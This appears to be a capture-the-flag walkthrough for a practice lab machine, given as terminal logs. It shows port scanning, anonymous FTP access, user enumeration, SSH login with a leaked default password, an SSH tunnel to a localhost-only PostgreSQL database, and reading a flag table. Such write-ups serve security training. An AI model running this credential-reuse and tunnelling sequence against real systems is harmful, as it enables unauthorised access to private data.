$ nmap -v -sV -p- 10.129.74.179 --min-rate 5000
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-04 10:15 CET
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 10:15
Scanning 10.129.74.179 [2 ports]
Completed Ping Scan at 10:15, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:15
Completed Parallel DNS resolution of 1 host. at 10:15, 0.02s elapsed
Initiating Connect Scan at 10:15
Scanning 10.129.74.179 [65535 ports]
Discovered open port 21/tcp on 10.129.74.179
Discovered open port 22/tcp on 10.129.74.179
Completed Connect Scan at 10:15, 12.86s elapsed (65535 total ports)
Initiating Service scan at 10:15
Scanning 2 services on 10.129.74.179
Completed Service scan at 10:15, 0.09s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.74.179.
Initiating NSE at 10:15
Completed NSE at 10:15, 0.00s elapsed
Initiating NSE at 10:15
Completed NSE at 10:15, 0.00s elapsed
Nmap scan report for 10.129.74.179
Host is up (0.037s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.25 seconds$ ftp 10.129.74.179
Connected to 10.129.74.179.
220 (vsFTPd 3.0.3)
Name (10.129.74.179:ruben): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||33254|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Nov 28 14:31 mail_backup
226 Directory send OK.
ftp> Users detected:
optimus@funnel.htb
albert@funnel.htb
andreas@funnel.htb
christine@funnel.htb
maria@funnel.htbAccording to the password policy found, the default’s password is funnel123#!#
$ ssh christine@10.129.74.179
christine@10.129.74.179's password:
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-135-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat 04 Mar 2023 09:30:41 AM UTC
System load: 0.0
Usage of /: 63.2% of 4.78GB
Memory usage: 12%
Swap usage: 0%
Processes: 159
Users logged in: 0
IPv4 address for docker0: 172.17.0.1
IPv4 address for ens160: 10.129.74.179
IPv6 address for ens160: dead:beef::250:56ff:fe96:a7ea
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt updateWhich service is running on TCP port 5432 and listens only on localhost?
christine@funnel:~$ ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:36709 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:5432 0.0.0.0:*
tcp LISTEN 0 32 *:21 *:*
tcp LISTEN 0 128 [::]:22 [::]:* Port 5432 is usually used by PostgreSQL
As we don’t have access to the previously mentioned service from our local machine, we need to create a tunnel and connect to it from your machine.
$ ssh -L 1234:localhost:5432 christine@10.129.74.179
christine@10.129.74.179's password:
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-135-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat 04 Mar 2023 10:16:35 AM UTC
System load: 0.0
Usage of /: 63.2% of 4.78GB
Memory usage: 13%
Swap usage: 0%
Processes: 161
Users logged in: 0
IPv4 address for docker0: 172.17.0.1
IPv4 address for ens160: 10.129.74.179
IPv6 address for ens160: dead:beef::250:56ff:fe96:a7ea
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sat Mar 4 10:10:01 2023 from 10.10.14.16$ psql -U christine -h localhost -p 1234
Contraseña para usuario christine:
psql (15.2 (Debian 15.2-1), servidor 15.1 (Debian 15.1-1.pgdg110+1))
Digite «help» para obtener ayuda.
christine=christine=# \l
Listado de base de datos
Nombre | Dueño | Codificación | Collate | Ctype | configuración ICU | Proveedor de locale | Privilegios
-----------+-----------+--------------+------------+------------+-------------------+---------------------+-------------------------
christine | christine | UTF8 | en_US.utf8 | en_US.utf8 | | libc |
postgres | christine | UTF8 | en_US.utf8 | en_US.utf8 | | libc |
secrets | christine | UTF8 | en_US.utf8 | en_US.utf8 | | libc |
template0 | christine | UTF8 | en_US.utf8 | en_US.utf8 | | libc | =c/christine +
| | | | | | | christine=CTc/christine
template1 | christine | UTF8 | en_US.utf8 | en_US.utf8 | | libc | =c/christine +
| | | | | | | christine=CTc/christine
(5 filas)christine=# \c secrets
psql (15.2 (Debian 15.2-1), servidor 15.1 (Debian 15.1-1.pgdg110+1))
Ahora está conectado a la base de datos «secrets» con el usuario «christine».
secrets=# \dt
Listado de relaciones
Esquema | Nombre | Tipo | Dueño
---------+--------+-------+-----------
public | flag | tabla | christine
(1 fila)secrets=# SELECT * FROM flag;
secrets=# SELECT * FROM flag;
value
----------------------------------
cf27XXXXXXXXXXXXXXXXXXXXXXXXXXXX
(1 fila)
secrets=#